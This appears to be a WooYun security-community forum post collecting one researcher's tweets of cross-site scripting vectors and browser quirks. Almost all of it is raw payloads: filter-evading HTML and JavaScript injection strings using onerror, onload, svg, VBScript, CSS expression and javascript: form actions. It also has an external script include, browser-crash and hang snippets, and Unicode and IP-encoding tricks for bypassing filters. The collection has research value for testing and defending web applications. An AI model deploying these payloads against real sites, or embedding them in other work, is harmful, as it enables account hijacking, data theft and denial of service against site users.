WooYun (white-hat technical community) >> xss >> A roundup of my tweets
<!-- " --!><input value="><img src=xx:x onerror=alert(1)//">
<script/onload=alert(1)></script> IE9
<style/onload=alert(1)>
alert([0x0D]-->[0x0D]1<!--[0x0D])1<!--i
document.write('<img src="<iframe/onload=alert(1)>\0">'); IE8
JSON.parse('{"__proto__":["a",1]}')
location++
IE valid syntax: 我,啊=1,b=[我,啊],alert(我,啊)
alert('aaa\0bbb') IE only show aaa
http://jsbin.com/emekog<svg><animation xLI:href="javascript:alert(1)"> based on H5SC#88 #Opera
Function('alert(arguments.callee.caller)')()
firefox dos? while(1)find();
<div/style=x:expression(alert(URL=1))>Inject <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> enabled css expression,breaking standard mode!
<applet code=javascript:alert('sgl')> and <embed src=javascript:alert('sgl')> umm...cute FF!
<math><script>sgl='<img/src=xx:x onerror=alert(1)>'</script> chrome firefox opera vector
<svg><oooooo/oooooooooo/onload=alert(1) > works on webkit~
<body/onload=\\\vbs\\\::::::::alert+'x'+[000000]+'o'+'x'+[000000]::::::::>
vbs:alert+-[]
<body/onload=vbs::::::::alert----+--+----1:::::::::>
Firefox vector <math><a xlink:href="//mmme.me">click
<svg><script>a='<svg/onload=alert(1)></svg>';alert(2)</script>
Inj>> <script/src=//0.gg/xxxxx> << <script>...</script> less xss
[code]
Webkit X-XSS-Protection header is enabled just now :P
<svg/onload=domain=id> 22 letters e.g http://fiddle.jshell.net./KG7fR/5/show/
<?xml encoding="><svg/onload=alert(1)// >">
<a "<img/src=xxx:x onerror=alert(1) >x</a> Distinctive IE
Also <a `="<img/onerror=alert(1) src=xx:xx>'></h1>">x</a><h1 "='<img/onerror=alert(1) src=xx:xx>'></h1> IE only
<1h name="<svg/onload=alert(1)>"></1h>
<img ="1 src=xxx:x onerror=alert(1)//" > works in not-IE
javascript=1;for(javascript in RuntimeObject());javascript=='javascript'
<body/onerror=alert(event)>
<img/src=javascript:throw[Object.getOwnPropertyNames(this)]> Firefox Sandbox object
<img src='javascript:while([{}]);'> works in firefox
for(x in document.open); Crash your IE 6:>
localStorage.setItem('setItem',1)
Only to find 'ſt'.toUpperCase()==='st'.toUpperCase()
J̌ H̱ T̈ W̊ Y̊ i̇ length==2
'ı'.toUpperCase()=='I'
Also 'ß'.toUpperCase()=='SS'
'ﬀ'.toUpperCase()=='FF' // alike: ﬁ FI ﬂ FL ﬃ FFI ﬄ FFL ſt ST ﬆ ST
#Opera data:text/html;base64,<<<<<<<<PH Nj cmlwdD5hb我-勒-个-去GVyd CgxKTwvc 2NyaXB0Pg=>>>>>>>>>>
Firefox always the most cute data:_,<script>alert(1)</script>
<a href="ftp:/baidu.com">xx</a>
http://ⓖⓄⓞⒼⓁⓔ︒ⒸⓄⓂ works in Firefox
RegExp.prototype.valueOf=alert,/-/-/-/;//IE,is there anything else?
location='javascript:alert(1)'
for({} in {}); interesting http://jsbin.com/inekab for Opera only
<a href=https:http://www.google.com>x</a> That's a relative path?
document.frames==window.frames
<a href="jar:xxx" id=x></a> x.protocol=='http:' on #firefox
(0).constructor.constructor=function(){alert(eval(arguments[0].substr(6)))} Easy to decode jjencode and aaencode :D
127.0x000000001==127.0.0.1
<input value="sefewfewf"/> Chrome input value block
<svg><xmp><img/onerror=alert(1) src=xxx:x />
<img src/="><img src=xxx:x onerror=alert(1)//">
Interesting isindex <isindex formaction=javascript:alert(1) type=submit >
chrome:xx - >chrome://crash/ crash?
<form action=javascript:alert(1) /><input> Chrome input enter fucked!
<form/><button/><keygen/> chrome send empty key,is funny~_~
<form/><input/formaction=javascript:alert(1)> Because <form> not a void element.
[/code]
[code]
<form><input/name="isindex"> when name is isindex does not send key.
<form id=x ></form><button form=x formaction="javascript:alert(1)">X It like http://html5sec.org/#1 but only chrome support .
<script language="php">echo 1 ?> Fascinating.
fvck:for(_ in this)_['match'](/.Element$/)&&console.log(_)
location.reload('javascript:alert(1)') //ie only,lol~
{}alert(1)
[/code]
Twitter @jackmasa =P

(">_< ' / & \ What are you looking at? Never seen XSS characters before?)